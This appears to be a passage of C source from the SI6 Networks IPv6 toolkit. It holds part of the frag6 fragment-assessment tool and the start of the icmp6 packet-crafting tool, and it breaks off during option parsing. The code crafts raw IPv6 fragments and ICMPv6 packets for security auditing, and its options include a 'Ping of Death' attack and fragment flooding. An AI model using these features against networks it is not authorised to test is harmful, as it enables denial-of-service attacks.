icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); } else{ if(tstamp_f){ if((ptr+ (sizeof(time_t) + sizeof(u_int32_t))) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } /* We include a timstamp to be able to measure the Fragment Reassembly timeout */ tstamp= time(NULL); *(time_t *)ptr= tstamp; ptr+= sizeof(time_t); /* We include a "checksum" such that we can tell the responses we elicit from other packets */ *(u_int32_t *)ptr= (u_int32_t)tstamp ^ 0xabcdabcd; if(fsize > (sizeof(time_t)+sizeof(u_int32_t))) fsize-= (sizeof(time_t)+sizeof(u_int32_t)); else fsize=0; } if(!fsize_f && (forder != LAST_FRAGMENT && forder != ATOMIC_FRAGMENT)){ fsize= (fsize>>3) << 3; } if((ptr+ (sizeof(time_t) + sizeof(u_int32_t))) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } for(i=0; i<(fsize/4); i++){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr- buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return 0; } /* * Function: send_fid_probe() * * Send a fragmented ICMPv6 Echo Request used for sampling the Fragment Identification * values sent by the target */ int send_fid_probe(struct iface_data *idata){ unsigned char fragbuffer[FRAG_BUFFER_SIZE]; struct ip6_frag *frag; struct ether_header *ethernet; struct ip6_hdr *ipv6; unsigned char *fptr, *fptrend; unsigned int i; ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; ipv6->ip6_nxt= IPPROTO_FRAGMENT; /* ptr always points to the part of the original packet that is being crafted */ ptr = (unsigned char *) v6buffer + sizeof(struct ip6_hdr); frag= (struct ip6_frag *) ptr; bzero(frag, sizeof(struct ip6_frag)); frag->ip6f_nxt= IPPROTO_ICMPV6; ptr+= sizeof(struct ip6_frag); /* fragpart points to the beginning of the fragmentable part of the original packet */ fragpart= ptr; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); *(u_int32_t *)ptr= icmp6_sig; ptr+= sizeof(u_int32_t); for(i=0;i<400; i++){ *(u_int32_t *)ptr= random(); ptr+=sizeof(u_int32_t); } icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-(unsigned char *)icmp6, IPPROTO_ICMPV6); /* ptrend points to the end of the original packet */ ptrend= ptr; ptr= fragpart; /* fptr points to the part of the fragment that is being crafted */ fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + FRAG_BUFFER_SIZE; /* Copy everything from the Ethernet header, up to (and including) the Fragmentation Header */ memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); fh= (struct ip6_frag *) (fragbuffer + idata->linkhsize + sizeof(struct ip6_hdr)); fh->ip6f_ident=random(); startoffragment = fptr; /* We'll be sending packets of at most 1280 bytes (the IPv6 minimum MTU) */ fragsize= ((MIN_IPV6_MTU - sizeof(struct ip6_hdr) - sizeof(struct ip6_frag)) >> 3) << 3; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent. This chec will always be passed, but is useful * when future versions of the tool support other link-layer technologies. */ if( (startoffragment + fragsize) > fptrend){ printf("Fragment size too large to fit into fragmentation buffer\n"); return(-1); } m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); return(-1); } } /* Sending fragments */ return(0); } /* * Function: usage() * * Prints the syntax of the frag6 tool */ void usage(void){ puts("usage: frag6 -i INTERFACE -d DST_ADDR [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-A HOP_LIMIT] [-u DST_OPT_HDR_SIZE]\n" " [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P FRAG_SIZE]\n" " [-O FRAG_TYPE] [-o FRAG_OFFSET] [-I FRAG_ID] [-T] [-n]\n" " [-p | -W | -X | -F N_FRAGS] [-l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the frag6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "frag6: A security assessment tool for attack vectors based on IPv6 fragments\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --frag-size, -P IPv6 fragment payload size\n" " --frag-type, -O IPv6 Fragment Type {first, last, middle, atomic}\n" " --frag-offset, -o IPv6 Fragment Offset\n" " --frag-id, -I IPv6 Fragment Identification\n" " --no-timestamp, -T Do not include a timestamp in the payload\n" " --no-responses, -n Do not print responses to transmitted packets\n" " --frag-reass-policy, -p Assess fragment reassembly policy\n" " --frag-id-policy, -W Assess the Fragment ID generation policy\n" " --pod-attack, -X Perform a 'Ping of Death' attack\n" " --flood-frags, -F Flood target with IPv6 fragments\n" " --loop, -l Send IPv6 fragments periodically\n" " --sleep, -z Pause between sending IPv6 fragments\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the frag6 tool\n" "\n" "Programmed by Fernando Gont for SI6 Networks (http://www.si6networks.com)\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, (!idata->hsrcaddr_f)?" (automatically selected)":""); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, (!idata->hdstaddr_f)?" (automatically selected)":""); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; ilinkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_HBH_LEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ fsize) && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6+ sizeof(struct icmp6_hdr)); if( *(u_int32_t *) pkt_ptr != (*(u_int32_t *) (pkt_ptr+sizeof(u_int32_t)) ^ 0xabcdabcd)){ return 0; } } break; case ICMP6_TIME_EXCEEDED: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ minfragsize= sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+sizeof(struct ip6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct icmp6_hdr) + (fsize_f?fsize:MIN_FRAG_SIZE) + \ (tstamp_f?(sizeof(time_t)+sizeof(u_int32_t)):0); if( ((pkt_end - (unsigned char *) pkt_ipv6) < minfragsize) && \ (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end){ return 0; } } else{ return 0; } if(pkt_fh_fh == NULL) return 0; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6_icmp6+ sizeof(struct icmp6_hdr)); if( *(u_int32_t *) pkt_ptr != (*(u_int32_t *) (pkt_ptr+sizeof(u_int32_t)) ^ 0xabcdabcd)){ return 0; } } } else{ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!(floodf_f && srcprefix_f) && !is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } return 1; } /* * Function: valid_icmp6_response2() * * Checks whether the response to an ICMPv6 probe (for identifying the fragment reassembly policy) is valid */ int valid_icmp6_response2(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned int minsize){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct ip6_ext *pkt_ext; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_frag *pkt_fh_fh; unsigned char *pkt_end; u_int8_t pkt_prev_nh; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_ipv6) < minsize && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; case ICMP6_TIME_EXCEEDED: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_ipv6) < minsize \ && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end){ return 0; } } else{ return 0; } if(pkt_fh_fh == NULL){ return 0; } /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } } else{ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!(floodf_f && srcprefix_f) && !is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } return 1; } /* * Function: test_frag_pattern() * * Check whether a specific pattern is present in a portion of an IPv6 fragment */ int test_frag_pattern(unsigned char *ptr, unsigned int size, char *block){ unsigned int i; for(i=0; i * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make icmp6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include #include #include #include #include #include #include #include #include #include "icmp6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); /* Flags used for the ICMPv6 Redirect (specifically) */ unsigned int icmp6type_f=0, icmp6code_f=0, mtu_f=0, pointer_f=0; unsigned int targetaddr_f=0, redirprefix_f=0, targetportl_f=0, targetporth_f=0; unsigned int peeraddr_f=0, peerportl_f=0, peerporth_f=0; unsigned int rhip6_f=0, rhtcp_f=0, rhudp_f=0, rhicmp6_f=0, nopayload_f=0, rheader_f=0; unsigned int tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned int icmp6id_f=0, icmp6seq_f=0; unsigned int rhlength_f=0, floodr_f=0, respmcast_f=0, makeonlink_f=0; unsigned int ip6hoplimit_f=0, ip6length_f=0, rhdefault_f=0; unsigned int learnrouter_f=0, sanityfilters_f=0, useaddrkey_f=0; /* Variables used for ICMPv6 Error messages (specifically) */ u_int8_t icmp6type=0, icmp6code=0; u_int32_t mtu, pointer; u_int16_t ip6length; struct in6_addr targetaddr, peeraddr; unsigned char redirpreflen, targetpreflen; unsigned int targetport, peerport; u_int16_t targetportl, targetporth, peerportl, peerporth, auxint16; u_int16_t tcpurg, tcpwin, icmp6id, icmp6seq; u_int32_t tcpseq, tcpack; u_int8_t tcpflags=0, ip6hoplimit; struct ip6_hdr *rhipv6; struct udp_hdr *rhudp; struct tcp_hdr *rhtcp; struct icmp6_hdr *rhicmp6; unsigned int nredirs, redirs; unsigned int rhbytes, rhlength, currentsize; unsigned char rh_hoplimit; unsigned char rhbuff[100]; /* This one must be able to hold the IPv6 header and the upper layer header */ /* Variables used for learning the default router */ struct iface_data idata; struct prefix_entry *prefix_ols[MAX_PREFIXES_ONLINK], *prefix_acs[MAX_PREFIXES_AUTO]; struct prefix_entry *prefix_local[MAX_LOCAL_ADDRESSES]; struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct dlt_null *dlt_null; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; u_int16_t mask; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char targetprefix_f=0, hoplimit_f=0, newdata_f=0, floods_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size, linkhsize; unsigned char *prev_nh, *startoffragment; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ int r, sel; fd_set sset, rset; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-addr", required_argument, 0, 's'}, {"dst-addr", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'c'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"icmp6", required_argument, 0, 't'}, {"icmp6-dest-unreach", required_argument, 0, 'e'}, {"icmp6-packet-too-big", no_argument, 0, 'E'}, {"icmp6-time-exceeded", required_argument, 0, 'A'}, {"icmp6-param-problem", no_argument, 0, 'R'}, {"mtu", required_argument, 0, 'm'}, {"pointer", required_argument, 0, 'O'}, {"sanity-filters", no_argument, 0, 'f'}, {"payload-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'P'}, {"no-payload", no_argument, 0, 'n'}, {"ipv6-hlim", required_argument, 0, 'C'}, {"target-addr", required_argument, 0, 'r'}, {"peer-addr", required_argument, 0, 'x'}, {"target-port", required_argument, 0, 'o'}, {"peer-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"resp-mcast", no_argument, 0, 'M'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"sanity-filters", no_argument, 0, 'f'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:c:u:U:H:y:S:D:r:t:e:EA:R:m:O:p:P:nC:x:o:a:X:q:Q:V:w:MO:j:k:J:K:b:g:B:G:flz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } hoplimit=64+random()%180; while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'c': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ 